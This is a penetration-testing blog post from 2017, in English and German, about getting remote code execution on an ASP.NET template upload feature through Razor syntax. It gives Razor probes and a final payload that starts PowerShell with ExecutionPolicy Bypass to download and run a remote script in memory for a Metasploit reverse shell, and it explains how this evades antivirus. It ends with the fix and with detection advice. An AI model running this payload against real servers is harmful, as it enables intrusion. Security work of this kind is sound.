Razor Code – Don't Cut Yourself

Razor Code

Don't Cut Yourself

Veit Hailperin
by Veit Hailperin
on January 05, 2017
time to read: 8 minutes

Some of my favorite blog articles are also the shortest – just a single tip or bypass. This article is written with that in mind and describes how I recently managed to achieve remote code execution (RCE) on a patched Windows server using Razor Code.

Classic file upload vulnerability

It’s one of the classic weak spots, RCE through file upload – you upload code, such as a PHP script, and call up the site in the hope that it will execute the code on the server. However, this is more and more handled appropriately and the Content-Disposition header is increasingly set correctly to Content-Disposition: attachment; filename="foo.php". This means even if it would be client-side code, the code will not execute client-side either.

During a recent web application penetration test, I happened upon a case that was a little different. The application had the option of uploading files that could then be used as templates. The design idea behind it was that companies that used the site could still retain their own CD/CI. Naturally, the site supported HTML and JavaScript. The resulting Cross Site Scripting vulnerability was therefore neither a surprise nor a major risk, as each customer received their own sub-domain.

For my next move, I wanted to test whether server-side code could be executed. My immediate first choice was .NET, because no hardening had been carried out and all response headers pointed to .NET – X-Powered-By: ASP.NET, x-aspnetmvc-version and x-aspnet-version. I needed a simple PoC:

<%
   PoCLabel.Text = “Alert!”;
%>
<!DOCTYPE html>
<html>
<head runat=“server”>
   <title>PoC</title>
</head>
<body>
   <form id=“form1” runat=“server”>
   <div>
      <asp:Label runat=“server” id=“PoCLabel”></asp:Label>
   </div>
   </form>
</body>
</html>

But this attempt failed. A simple < was not filtered – since HTML had to be possible – but <@ was.

Razor code for the win

Razor code is an option for writing both C# and VB code using a different syntax. The important thing for us here is that we drop the introductory <@, which is filtered by the application. Here’s an example that also serves as proof of concept:

@DateTime.Now

It worked. The site rendered in the template showed the current time of the server. No doubt about it – I had remote code execution. Other useful PoCs include:

@Decimal.Add(7, 7)
@AppContext.BaseDirectory
@Environment.MachineName

The reverse shell

In order to execute code more conveniently, I wanted a reverse shell. The standard Meterpreter payloads support ASP.NET, but not in Razor Code. Alternatively, PowerShell could be used to launch a reverse shell. A quick search for exec for asp.net turned up System.Diagnostics.Process.Start. This function enables commands to be executed in ASP.NET.

A few more thoughts on reverse shells:

  1. PowerShell executions can be limited. Seeing as it wasn’t clear whether or not PowerShell execution would be restricted, I wanted to be on the safe side and mitigate as many issues as possible before they could even arise. Fortunately, this limitation is easy to remove. The option of the ExecutionPolicy is conveniently named ByPass, and the official description says: “Nothing is blocked and there are no warnings or prompts.”
  2. Loading the complete reverse shell payload code into the template would have left conspicuous traces. Since the template is saved and the metasploit payload is known, there was also the danger that the AV system would recognize it as malware. To ensure that this wouldn’t happen, and since the application allowed templates to be integrated externally (user-friendliness), there was a better option. We host a PowerShell script containing Razor Code on a server under our control. The script gets loaded into RAM and is executed there. The benefit is that detection of our script is now even more unlikely. This is a technique also used by Matt Graeber, author of the PowerSploit tool. The script is our own modified variation of Invoke-Shellcode from the PowerSploit framework, with the associated ShellCode for a metasploit reverse shell. So the final command was:
@System.Diagnostics.Process.Start(“powershell.exe”,”-ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString(‘http://url/scip.ps1’)”)

The aftermath

The application was provided with a functioning quick fix on the same day as the report. The developers later replaced this with a better fix, as the quick fix broke the CSS.

Anyone trying to detect attacks, take note: this could have been detected by monitoring processes newly spawned by the server process. Alternatively, you can also Monitor PowerShell.

Another option would be PowerShell’s Antimalware Scan Interface (AMSI). Anti-virus software that supports AMSI can also check PowerShell scripts in RAM. Currently, however, AMSI is rarely seen in productive systems.

About the Author

Veit Hailperin

Veit Hailperin has been working in information security since 2010. His research focuses on network and application layer security and the protection of privacy. He presents his findings at conferences.

Links

You want to test the strength of your enterprise regarding malware attacks?

Our experts will get in contact with you!

×
OTPs as Second Factor

OTPs as Second Factor

Mark Zeman

JWT Issues

JWT Issues

Andrea Hauser

CIS Controls

CIS Controls

Tomaso Vasella

Ransomware Detection, Defense, and Analysis

Ransomware Detection, Defense, and Analysis

Marc Ruef

You want more?

Further articles available here

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here

Razor Code - Don't Cut Yourself

Razor Code

Don't Cut Yourself

Veit Hailperin
von Veit Hailperin
am 05. Januar 2017
Lesezeit: 8 Minuten

Einige meiner Lieblingsblogartikel sind sehr kurz und haben nur einen Tipp oder Bypass drin. Dieser Artikel orientiert sich daran und beschreibt, wie ich in einem Penetration Test Remote Code Execution (RCE) auf einem aktuell gepatchten Windows Server mittels Razor Code erlangt habe.

Klassische File Upload Verwundbarkeit

Es ist ein Klassiker unter Schwachstellen, RCE durch File Upload: Man lädt einen serverseitig ausführbaren Code, wie z.B. ein PHP-Skript, hoch und ruft die Seite in der Hoffnung auf, dass der Server diesen ausführt. Dies wird jedoch in der Regel heutzutage nur noch selten gefunden und der Content-Disposition Header wird auch immer häufiger korrekt auf Content-Disposition: attachment; filename="foo.php" gesetzt. Damit wird der Code, wäre es client-seitig ausführbarer Code, auch client-seitig nicht ausgeführt.

Bei einem der Web Application Penetration Tests fand ich allerdings einen Fall, der war etwas spezieller. Die Applikation hatte eine Möglichkeit, Dateien hochzuladen, welche anschliessend als Template verwendet werden. Die Designidee dahinter war, dass Firmen, die die Seite nutzen, gleichzeitig ihr CD-CI beibehalten können. Natürlich unterstützt die Seite HTML, dementsprechend auch JavaScript. Das damit gelieferte XSS war also weder eine Überraschung noch ein grosses Risiko, da jeder Kunde seine eigene Subdomain erhält.

In einem nächsten Schritt wollte ich testen, ob serverseitig Code ausgeführt wurde. Die Wahl fiel sofort auf .NET, da kein Hardening betrieben worden war und sämtliche Response Header .NET suggerierten – X-Powered-By: ASP.NET, x-aspnetmvc-version und x-aspnet-version. Ein simpler PoC musste her:

<%
   PoCLabel.Text = “Alert!”;
%>
<!DOCTYPE html>
<html>
<head runat=“server”>
   <title>PoC</title>
</head>
<body>
   <form id=“form1” runat=“server”>
   <div>
      <asp:Label runat=“server” id=“PoCLabel”></asp:Label>
   </div>
   </form>
</body>
</html>

Doch dieser schlug fehl. Ein simples < wurde nicht gefiltert – da HTML ja möglich sein musste – aber <@ schon.

Razor Code for the Win

Razor Code ist eine Möglichkeit, um sowohl C#, als auch VB Code in einem anderen Syntax zu schreiben. Wichtig für uns ist dabei, dass die Einleitung <@ entfällt, die von der Applikation gefiltert wird. Ein Beispiel und gleichzeitig Proof-of-Concept ist:

@DateTime.Now

Und es funktionierte. Die Seite, welche im Template gerendert wurde, zeigte die aktuelle Zeit des Servers an. Ich hatte definitiv Remote Code Execution. Andere gute PoCs sind:

@Decimal.Add(7, 7)
@AppContext.BaseDirectory
@Environment.MachineName

Die Reverse Shell

Um komfortabler Code ausführen zu können, wollte ich eine Reverse Shell haben. Die regulären Meterpreter Payloads unterstützen zwar ASP.NET, aber nicht in Razor Code. Eine weitere Möglichkeit wäre mittels PowerShell eine Reverse Shell zu starten. Eine kurze Suche nach exec for asp.net ergab System.Diagnostics.Process.Start. Mit dieser Funktion lassen sich Befehle in ASP.NET ausführen.

Weitere Gedanken zur Reverse Shell:

  1. PowerShell-Ausführung lässt sich limitieren. Da es nicht klar war, ob PowerShell-Ausführung limitiert ist, wollte ich auf Nummer sicher gehen und lieber nicht in das Problem hineinlaufen. Glücklicherweise lässt sich diese Limitierung leicht aufheben. Die Option der ExecutionPolicy heisst netterweise auch ByPass und die offizielle Beschreibung lautet: “Nothing is blocked and there are no warnings or prompts.”
  2. Den kompletten Reverse-Shell Payload Code in das Template zu laden, hätte auffällig bleibende Spuren hinterlassen. Da das Template gespeichert wird und der Metasploit Payload bekannt ist, bestand auch die Gefahr, dass ein AV-System dies als Malware erkennen würde. Um aber sicher zu gehen, dass dies nicht geschieht, und da die Applikation zuliess, dass Templates auch von extern eingebunden werden können (Benutzerfreundlichkeit), gab es eine bessere Möglichkeit: Nachladen von einem von uns gehosteten PowerShell Script, welches anschliessend direkt in den RAM geladen und ausgeführt wird, was die Erkennung noch unwahrscheinlicher macht. Die Technik wird auch von Matt Graeber, dem Autor des Tools PowerSploit, verwendet. Das Script ist eine von uns modifizierte Variante von Invoke-Shellcode aus dem PowerSploit Framework, mit dem dazugehörigen ShellCode für eine Metasploit Reverse Shell. Der schlussendliche Befehl lautet dann:
@System.Diagnostics.Process.Start(“powershell.exe”,”-ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString(‘http://url/scip.ps1’)”)

The Aftermath

Die Applikation wurde noch am gleichen Tag des Reports mit einem funktionierenden Quickfix versehen. Die Entwickler haben diesen später durch einen besseren Fix ersetzt, da der Quickfix CSS brach.

Für diejenigen, die versuchen Angriffe zu detektieren: Dies hätte man bemerken können, indem man die Prozesse überwacht, die neu vom Serverprozess gespawnt werden. Alternativ könnte man auch PowerShell überwachen.

Eine weitere Möglichkeit wäre PowerShells Antimalware Scan Interface (AMSI). Antivirensoftware, die AMSI unterstützen, können auch PowerShell Skripte im RAM überprüfen. Momentan wird AMSI aber kaum im aktiven Einsatz beobachtet.

Über den Autor

Veit Hailperin

Veit Hailperin arbeitet seit 2010 im Bereich der Informationssicherheit. Seine Forschung konzentriert sich auf Network und Application Layer Security sowie auf den Schutz der Privatsphäre. Die Resultate präsentiert er an Konferenzen.

Links

Sie wollen die Resistenz Ihres Unternehmens auf Malware prüfen?

Unsere Spezialisten kontaktieren Sie gern!

×
Crypto-Malware

Crypto-Malware

Ahmet Hrnjadovic

TIBER-EU Framework

TIBER-EU Framework

Dominik Altermatt

Vertrauen und KI

Vertrauen und KI

Marisa Tschopp

Datenverschlüsselung in der Cloud

Datenverschlüsselung in der Cloud

Tomaso Vasella

Sie wollen mehr?

Weitere Artikel im Archiv

Sie brauchen Unterstützung bei einem solchen Projekt?

Unsere Spezialisten kontaktieren Sie gern!

Sie wollen mehr?

Weitere Artikel im Archiv